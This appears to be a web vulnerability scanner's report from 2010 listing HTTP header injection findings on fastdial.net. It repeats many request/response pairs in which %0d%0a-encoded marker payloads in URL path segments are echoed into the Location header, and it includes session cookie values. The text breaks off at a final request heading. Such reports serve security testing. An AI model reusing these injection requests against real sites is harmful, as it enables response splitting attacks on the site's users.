GET /2067f%0d%0ac3a6dc9999c/images/common/styles/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:49 GMT Server: Apache Location: http://fastdial.net/2067f c3a6dc9999c/images/common/styles/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload c71bf%0d%0a098a42e2211 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/c71bf%0d%0a098a42e2211/common/styles/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:06 GMT Server: Apache Location: http://fastdial.net/static/c71bf 098a42e2211/common/styles/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 8dca8%0d%0ab57609d51e4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/8dca8%0d%0ab57609d51e4/styles/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:21 GMT Server: Apache Location: http://fastdial.net/static/images/8dca8 b57609d51e4/styles/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 2899c%0d%0a200fc8752e7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/2899c%0d%0a200fc8752e7/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:36 GMT Server: Apache Location: http://fastdial.net/static/images/common/2899c 200fc8752e7/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 66df4%0d%0a0e621499803 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/66df4%0d%0a0e621499803/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:53 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/66df4 0e621499803/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload b0d4a%0d%0ad7e47d2552 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/b0d4a%0d%0ad7e47d2552/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:42:16 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/b0d4a d7e47d2552/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 9e10e%0d%0a4093a99bb12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9e10e%0d%0a4093a99bb12/images/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:50:32 GMT Server: Apache Location: http://fastdial.net/9e10e 4093a99bb12/images/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload f2805%0d%0ae241e2978db was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/f2805%0d%0ae241e2978db/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:50:50 GMT Server: Apache Location: http://fastdial.net/static/f2805 e241e2978db/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload f6f78%0d%0a7a3113567cd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/f6f78%0d%0a7a3113567cd/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:51:15 GMT Server: Apache Location: http://fastdial.net/static/images/f6f78 7a3113567cd/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 4dac9%0d%0ab433a70cff7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/4dac9%0d%0ab433a70cff7/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:51:34 GMT Server: Apache Location: http://fastdial.net/static/images/common/4dac9 b433a70cff7/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 8b9a8%0d%0a3d971ac4074 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/8b9a8%0d%0a3d971ac4074/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:51:47 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/8b9a8 3d971ac4074/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 2e422%0d%0aa90ab0614c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2e422%0d%0aa90ab0614c/images/common/styles/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:39:55 GMT Server: Apache Location: http://fastdial.net/2e422 a90ab0614c/images/common/styles/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload fbc75%0d%0a8aefca30270 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/fbc75%0d%0a8aefca30270/common/styles/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:13 GMT Server: Apache Location: http://fastdial.net/static/fbc75 8aefca30270/common/styles/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload d3a85%0d%0ab64dda3b5f1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/d3a85%0d%0ab64dda3b5f1/styles/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:27 GMT Server: Apache Location: http://fastdial.net/static/images/d3a85 b64dda3b5f1/styles/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 90fe7%0d%0a1faf2cf0fb2 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/90fe7%0d%0a1faf2cf0fb2/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:38 GMT Server: Apache Location: http://fastdial.net/static/images/common/90fe7 1faf2cf0fb2/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload b2b14%0d%0ae286d9c4c59 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/b2b14%0d%0ae286d9c4c59/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:53 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/b2b14 e286d9c4c59/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 78638%0d%0a869ac7c1cb2 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/78638%0d%0a869ac7c1cb2/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:10 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/78638 869ac7c1cb2/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload c8337%0d%0aa1c92f0554 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c8337%0d%0aa1c92f0554/images/common/styles/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:39:40 GMT Server: Apache Location: http://fastdial.net/c8337 a1c92f0554/images/common/styles/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 2 is copied into the Location response header. The payload 1fad1%0d%0ab14125b23d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/1fad1%0d%0ab14125b23d/common/styles/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:39:51 GMT Server: Apache Location: http://fastdial.net/static/1fad1 b14125b23d/common/styles/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 3 is copied into the Location response header. The payload d9c25%0d%0a7e35bfbf963 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/d9c25%0d%0a7e35bfbf963/styles/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:09 GMT Server: Apache Location: http://fastdial.net/static/images/d9c25 7e35bfbf963/styles/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 4 is copied into the Location response header. The payload 19d2f%0d%0af713f5e046b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/19d2f%0d%0af713f5e046b/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:20 GMT Server: Apache Location: http://fastdial.net/static/images/common/19d2f f713f5e046b/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 5 is copied into the Location response header. The payload 3299e%0d%0add5520790b was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/3299e%0d%0add5520790b/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:34 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/3299e dd5520790b/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 6 is copied into the Location response header. The payload 542ab%0d%0a0e7a35d878d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/542ab%0d%0a0e7a35d878d/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:49 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/542ab 0e7a35d878d/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 7 is copied into the Location response header. The payload 36ff9%0d%0a0ac2802a6c5 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/styles/36ff9%0d%0a0ac2802a6c5/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:06 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/styles/36ff9 0ac2802a6c5/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 1 is copied into the Location response header. The payload 60c00%0d%0a75e319f33c1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60c00%0d%0a75e319f33c1/images/common/styles/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:39:57 GMT Server: Apache Location: http://fastdial.net/60c00 75e319f33c1/images/common/styles/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload bf442%0d%0ab3e0c65f31e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/bf442%0d%0ab3e0c65f31e/common/styles/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:16 GMT Server: Apache Location: http://fastdial.net/static/bf442 b3e0c65f31e/common/styles/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 1fbb2%0d%0a8644825ceda was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/1fbb2%0d%0a8644825ceda/styles/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:29 GMT Server: Apache Location: http://fastdial.net/static/images/1fbb2 8644825ceda/styles/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 1e74d%0d%0a30cbcea8c20 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/1e74d%0d%0a30cbcea8c20/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:43 GMT Server: Apache Location: http://fastdial.net/static/images/common/1e74d 30cbcea8c20/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 1d140%0d%0a17f1eff44f7 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/1d140%0d%0a17f1eff44f7/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:00 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/1d140 17f1eff44f7/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 90fd0%0d%0ab0cb021e3c2 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/90fd0%0d%0ab0cb021e3c2/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:13 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/90fd0 b0cb021e3c2/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload e370e%0d%0a7fa1f13b431 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e370e%0d%0a7fa1f13b431/images/common/styles/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:43:42 GMT Server: Apache Location: http://fastdial.net/e370e 7fa1f13b431/images/common/styles/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 2904a%0d%0a2e206fdd8f2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/2904a%0d%0a2e206fdd8f2/common/styles/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:01 GMT Server: Apache Location: http://fastdial.net/static/2904a 2e206fdd8f2/common/styles/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 4e193%0d%0acf2c3eeabbd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/4e193%0d%0acf2c3eeabbd/styles/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:14 GMT Server: Apache Location: http://fastdial.net/static/images/4e193 cf2c3eeabbd/styles/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 198a9%0d%0ab24ff7069fc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/198a9%0d%0ab24ff7069fc/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:33 GMT Server: Apache Location: http://fastdial.net/static/images/common/198a9 b24ff7069fc/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload b47d8%0d%0a77ce012928d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/b47d8%0d%0a77ce012928d/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:48 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/b47d8 77ce012928d/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload d2afe%0d%0adde44f377f6 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/images/d2afe%0d%0adde44f377f6/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:45:04 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/images/d2afe dde44f377f6/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 55f61%0d%0ac0bff6462dd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /55f61%0d%0ac0bff6462dd/images/common/styles/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:04 GMT Server: Apache Location: http://fastdial.net/55f61 c0bff6462dd/images/common/styles/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 9a7db%0d%0a55eafa73e31 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
